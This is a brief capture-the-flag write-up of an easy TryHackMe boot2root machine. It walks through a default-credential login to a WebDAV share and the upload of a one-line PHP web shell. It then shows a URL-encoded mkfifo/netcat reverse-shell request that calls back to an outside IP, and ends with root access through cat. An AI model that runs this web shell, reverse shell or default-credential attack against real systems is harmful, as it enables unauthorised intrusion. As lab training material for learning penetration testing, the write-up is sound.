boot2root machine for FIT and bsides guatemala CTF
This is Dav from THM. This one is ranked as easy and doesn’t give much in the way of hints as to what it’s about.
Ports
HTTP only; makes it simple.
HTTP
Running a basic gobuster turns up a single page: /webdav. This has basic authentication turned on; let’s try some default credentials: wampp:xampp - success! We find some more credentials:
wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91
But I can’t crack the hash, and at this stage I don’t have anywhere to use it anyway. What else can we do? I’ve never done webdav before.
This blog gives some instructions; essentially we can use a command line tool called cadaver to connect and it provides a connection somewhat like FTP or SMB.
Shell
Using this interface I upload some PHP code to a file called cmd.php
<?php system($_GET[‘cmd’]);?>
From there, I can issue a shell command with Burp Repeater:
GET /webdav/cmd.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f HTTP/1.1
Privsec
I run linpeas; we can run cat as root. From there we get the root flag and can also read the shadow file if we want: